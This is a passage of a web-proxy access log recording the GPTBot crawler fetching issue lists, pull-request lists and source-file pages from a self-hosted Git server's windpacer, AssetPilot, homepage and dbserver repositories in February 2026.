192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11437] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11437] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11438] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11296] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:19:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33615] [Gzip 10.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11281] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 12135] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:19:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:19:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 